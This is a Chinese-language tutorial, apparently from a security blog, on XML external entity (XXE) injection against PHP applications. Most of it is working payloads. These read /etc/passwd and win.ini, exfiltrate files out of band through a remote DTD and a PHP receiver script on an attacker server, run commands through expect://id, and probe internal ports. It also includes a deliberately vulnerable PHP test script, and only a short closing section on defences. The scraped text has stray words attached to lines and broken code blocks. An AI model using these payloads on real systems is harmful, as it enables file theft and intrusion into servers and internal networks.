XML實體注入漏洞 php
測試代碼1:新建xmlget.php,複製下面代碼html
|
1
2
3
4
5
|
<?php
$xml=$_GET[
'xml'
];
$data = simplexml_load_string($xml);
print_r($data);
?>
|
漏洞測試利用方式1:有回顯,直接讀取文件linux
|
1
2
3
4
5
6
7
|
<?xml version=
"1.0"
encoding=
"utf-8"
?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM
"file:///etc/passwd"
>]>
<root>
<name>&xxe;</name>
</root>
|
LINUX: windows
|
1
|
http:
//192.168.106.154/xml/example1.php?xml=<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE UserInfo[<!ENTITY name SYSTEM "file:///etc/passwd">]><aa>&name;</aa>
|
讀取passwd文件,需URL編碼後執行。安全
windows:服務器
|
1
2
3
4
5
6
7
|
http:
//192.168.106.208/xxe1.php?xml=<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM
"file:///C:/windows/win.ini"
>]>
<root>
<name>&xxe;</name>
</root>
|
讀取文件、也能夠讀取到內容D盤的文件夾,形式如: file:///d:/微信
URL編碼後可執行:網絡
http://192.168.106.208/xxe1.php?xml=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22utf-8%22%3F%3E%20%0A%3C%21DOCTYPE%20xxe%20%5B%0A%3C%21ELEMENT%20name%20ANY%20%3E%0A%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2f%2f%2fC%3A%2fwindows%2fwin.ini%22%20%3E%5D%3E%0A%3Croot%3E%0A%3Cname%3E%26xxe%3B%3C%2fname%3E%0A%3C%2froot%3Epost
漏洞測試利用方式2:無回顯,引用遠程服務器上的XML文件讀取文件測試
將如下1.xml保存到WEB服務器下
1.xml
|
1
2
|
<!ENTITY % a SYSTEM
"file:///etc/passwd"
>
<!ENTITY % b
"<!ENTITY % c SYSTEM 'gopher://xxe.com/%a;'>"
> %b; %c;
|
Payload:
|
1
2
3
4
|
<?xml version=
"1.0"
encoding=
"UTF-8"
?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM
"http://192.168.106.208/1.xml"
>
%remote;]>
|
http://localhost/ceshi/xmlget.php?xml=<?xml version="1.0"?><!DOCTYPE a [<!ENTITY % d SYSTEM "http://localhost/ceshi/evil.dtd">%d;]><aa>&b;</aa>
evil.dtd文件:<!ENTITY b SYSTEM "file:///F:/linux/1.txt">
漏洞測試利用方式3:
在主機上放一個接收文件的php(get.php):
|
1
2
3
|
<?php
file_put_contents(
'01.txt'
, $_GET[
'xxe_local'
]);
?>
|
1.xml內容:
|
1
2
3
4
|
<!ENTITY % payload SYSTEM
"php://filter/read=convert.base64-encode/resource=file:///etc/passwd"
>
<!ENTITY %
int
"<!ENTITY % trick SYSTEM 'http://192.168.106.208/dede/get.php?id=%payload;'>"
>
%
int
;
%trick;
|
Payload:
|
1
2
3
4
|
<?xml version=
"1.0"
encoding=
"UTF-8"
?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM
"http://192.168.106.208/1.xml"
>
%remote;]>
|
網站目錄下生成01.txt,將內容進行base64解碼,獲取內容。
測試代碼2:
新建一個xmltest.php,複製下面內容,直接訪問該文件能夠讀取file文件內容。
<?php
$xml=<<<EOF
<?xml version="1.0" ?>
<!DOCTYPE ANY[
<!ENTITY xxe SYSTEM "file:///F:/linux/1.txt">
]>
<x>&xxe;</x>
EOF;
$data = simplexml_load_string($xml);
print_r($data)
?>
讀取任意文件
|
1
2
3
4
5
6
7
|
<?xml version=
"1.0"
encoding=
"utf-8"
?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM
"file:///etc/passwd"
>]>
<root>
<name>&xxe;</name>
</root>
|
執行系統命令
在安裝expect擴展的PHP環境裏執行系統命令,其餘協議也有可能能夠執行系統命令
|
1
2
3
4
5
6
7
|
<?xml version=
"1.0"
encoding=
"utf-8"
?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM
"expect://id"
>]>
<root>
<name>&xxe;</name>
</root>
|
探測內網端口
|
1
2
3
4
5
6
7
|
<?xml version=
"1.0"
encoding=
"utf-8"
?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM
"http://127.0.0.1:80"
>]>
<root>
<name>&xxe;</name>
</root>
|
攻擊內網網站
|
1
2
3
4
5
6
7
|
<?xml version=
"1.0"
encoding=
"utf-8"
?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM
"http://127.0.0.1:80/payload"
>]>
<root>
<name>&xxe;</name>
</root>
|
防護XXE攻擊
方案1、使用開發語言提供的禁用外部實體的方法
PHP:
libxml_disable_entity_loader(true);
JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
Python:
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
方案2、過濾用戶提交的XML數據
關鍵詞:<!DOCTYPE和<!ENTITY,或者,SYSTEM和PUBLIC。
關於我:一個網絡安全愛好者,致力於分享原創高質量乾貨,歡迎關注個人我的微信公衆號:Bypass--,瀏覽更多精彩文章。